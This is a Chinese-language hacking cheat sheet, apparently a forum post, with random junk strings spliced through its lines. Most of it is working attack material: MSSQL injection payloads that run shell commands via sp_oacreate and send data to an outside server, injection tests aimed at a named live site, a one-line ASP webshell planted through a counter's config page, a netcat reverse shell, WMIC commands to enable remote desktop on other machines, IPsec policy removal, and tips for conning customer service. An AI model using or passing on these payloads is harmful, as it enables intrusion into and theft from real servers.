SA点数据库分离技术相关
+ G/ A9 V$ k, r( H7 q. r% S; s- E D) A- K a& u( x
$ f2 O3 x2 {2 M7 GSA点数据库分离搞法+语句:
0 N5 F. u( j1 m4 J' u3 O) V8 o/ [8 K0 @4 f. b; I! i5 p0 y
注射点不显错,执行下面三条语句页面都返回正常。
" {& N2 U+ p8 S1 ]) aand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')3 Y# {4 W6 U c/ y( G3 @3 o$ F2 Z4 n
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
& Y& g W4 x. z5 Wand 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
+ s7 ?/ B9 s, l# \* D4 B可以列目录,判断系统为2000,web与数据库分离
' }& o9 ~0 g8 _1 b遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
. ?: ^6 Q8 N) L8 t+ I0 u3 k% [在注射点上执行
/ W& f2 ]) {+ Y J0 p- t/ \" ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--6 u$ W N/ s4 l' b: n
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP) [% l' n4 ~, E/ _
还有我用NC监听得其他端口都没有得到IP。
' G$ \5 e R0 G6 T2 @6 [! a: N& @# M S7 u2 O
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) d: r- m- w: O
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--3 w3 m: J4 G, z5 U+ n6 e
9 q2 k: Y2 S. ?# U;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--) I9 F; r9 V8 u9 o& z# c8 W7 t: S
1 t9 b1 P! q4 s( k+ \5 N
现在就猜想是不是数据库是内网而且不能连外网。
6 n3 F8 c9 t' |. k @/ V& w# J q2 ]' n( h
" q; Q* {/ ?4 Q) U T8 ]0 \9 Y0 U
access导出txt文本代码
6 V' N- Q6 A9 ISELECT * into [test.txt] in 'd:\web\' 'text;' from admin! y, l& t* e8 T- b
3 ?' b0 b; U1 t: b0 N8 {
; X3 L2 q* N0 F& D5 X6 _
) M" Y( _6 T6 P2 p7 d! G
自动跳转到指定网站代码头1 |6 k# o, G- G9 m6 j4 n9 L0 `2 u( w
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
1 k# x, K% R6 Y1 J# W; R9 w3 M; m( n4 F2 C' n' J
% {0 b; A% s+ }( E9 c8 p( n入侵java or jsp站点时默认配置文件路径:
7 w0 b6 n$ K5 @0 A% H\web-inf\web.xml1 I: K7 M# J8 `; R
tomcat下的配置文件位置:
5 b) t8 u* Z' w' Q. u4 ^3 Z9 ]6 _\conf\server.xml (前面加上tomcat路径). f6 c2 S L# j/ i9 L/ f
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
5 U* \6 I5 \7 F$ ?. O& H2 @& b: U& f0 t- }
1 g$ n6 N; f) W2 Q, y
! I1 E6 a& F u. f; ]检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:6 F, M5 l4 m1 N
-1%23
0 P8 u( @) q* W7 i>
; {9 c7 k" A; C<
9 P3 ]' I, D' O6 Z7 O: Q: E1'+or+'1'='1
9 Z; ?% O# p# j8 V7 d$ K- x" pid=8%bf
0 g5 \0 ^6 w% s0 D+ L' Q. X
6 s' g5 C/ X2 x7 B: h, l全新注入点检测试法:
: X" C; [5 ~+ z: t4 i在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。4 A/ I7 d7 r3 m0 q1 v
# x) V: Q( B' Z& ]! G6 b
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。0 ~) |* h8 h ^0 u! R; l
/ A$ w% j# {* \2 y% n. H# M
搜索型注入判断方法:5 r/ J/ u3 F" J7 j+ I7 a" c
北京%' and '1'='1' and '%'='
+ U, l4 G5 s/ L北京%' and '1'='2' and '%'='& c0 p" M! f! c3 w1 O9 M
' B" F9 u) O |7 Q+ R
9 B' u3 A- p% @( u' @
COOKIES注入:
3 M6 F; r# _4 E3 ^! F$ V2 I7 \+ U E$ p: i
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
' U# Q- r$ r4 k" S$ G0 f& `, g2 d, `1 G+ @1 x2 {
2000专业版查看本地登录用户命令:
+ |: ~' ], [6 r2 unet config workstation% s% I5 _* d, a! N8 B7 i3 U
& U4 W, U/ q+ J. |' a' A. o9 U, a6 A
2003下查看ipsec配置和默认防火墙配置命令:
9 |' N( L1 ?% z- K! Q3 ynetsh firewall show config- c G; |. f t# _: v
netsh ipsec static show all
$ Z }% l& R: F( g! A' F! y$ V" g: b. Y6 q) }
不指派指定策略命令:
* n$ G. _* a% O. C* wnetsh ipsec static set policy name=test assign=n (test是不指派的策略名)
1 R; }+ p+ n; G$ a% i3 W: cnetsh ipsec static show policy all 显示策略名
% M- o2 E7 ^1 ^9 O# {8 P: `2 l2 A9 P! X
8 z0 [5 C$ |% E1 h8 e猜管理员后台小技巧:% \) x- X9 v2 i
admin/left.asp
3 Z" C& b3 _9 {4 f! }; x5 Eadmin/main.asp. f; @5 }, e; |* s5 F9 q8 R
admin/top.asp* Q" ^) J" R/ P; O( C9 G
admin/admin.asp
" s5 h7 N1 x, }* \# h会现出菜单导航,然后迅雷下载全部链接
; m! R: B5 \" z# R8 |7 b5 D7 n
6 d! Q- s" a4 _
# v) q- ]3 q0 m! B3 R& n, F社会工程学:
" x3 q8 F. \& U# g$ O用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
& i6 ^, D' g+ \4 T B! R5 u然后去骗客服# \% l/ {; d6 v3 S2 d7 Y) \
! k2 l, ~, G: ?
7 T; D' a* r" o& w7 P' O1 {统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 8 K$ M9 E/ m& t, Q% x% i5 B
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 7 e' @+ ]$ C0 p- Y3 }5 } A0 H
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
& c$ T" F5 D" N# g& O" T$ r
+ e3 G0 `$ _3 u: s6 n5 b) I0 b! I- Z4 t5 H K; o; K4 W
( v& \% a6 }& L Z6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
+ C V& @0 w7 n
5 F# b! }/ f2 {. v" k, U3 O
5 d; u) l" a. q
3 x N# C8 c% Q) O4 i6 wCMD加密注册表位置6 D" h, ^4 @. |# ?# Z6 `: U1 Q
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
; g: t' }# n* M) uAutoRun
+ ]4 T6 x5 H: J& j! H) m' U: v) ~5 z4 m8 V0 @
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor! N$ I- `( {4 Q- Q; n
AutoRun2 R: U9 x" F' k% i
2 N! Q9 {+ i' U/ x/ Z
% Q3 L" t H+ S& g' K: _在找注入时搜索Hidden,把他改成test- i# f) Y+ d. O: G. E# u" J* I
% J1 J& R* B* w1 M; y* A5 N" j- N9 Z: t, R$ Y. g. r+ B
+ H; x2 W- D1 H: Bmstsc /v:IP /console 5 y3 i' v' @" J# e, G z$ Q
, m( O3 f- o T$ k5 f3 @/ r# G" B. z* {; ~$ I9 k
一句话开3389:
" L1 j5 `7 }# G6 g
: @! c- V# d8 Y3 m1 k: G最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
' i8 f4 G4 n% A8 C开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.9 [5 A) |! P6 V' O9 N+ P, Q
. F+ C, k& F0 Q3 R! A
- p2 x# Z% K- k' Z. U0 U知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:, x* R8 ^. V/ \
Insert into admin(user,pwd) values('test','test')
J" k: }" G g0 I3 Y9 l2 w w: H$ p
+ Y& B# X5 `& K: e% h9 WNC反弹
% g$ j# A/ \' {# E- d% T) j# ~1 K/ f先在本机执行: nc -vv -lp 监听的端口 (自己执行)
Z, Z" \' `3 j" H5 c5 O然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行). H+ @7 Y3 D' s. x
) c! p. t6 P" L: _7 J; D( V: [
5 i/ X+ u3 T- W" l I
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题 Y: g% R$ D4 |
* U2 r- J; T4 \4 Y# b1 M, p0 S9 y
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录# s: n C9 S5 u$ V3 v- h* ^, B$ z
例如:
$ k5 e7 r# R0 O/ o/ ~3 j9 Qsubst k: d:\www\ 用d盘www目录替代k盘5 A$ }+ z% ^/ U( J' P7 u) ?# ^% u
subst k: /d 解除K盘代替 |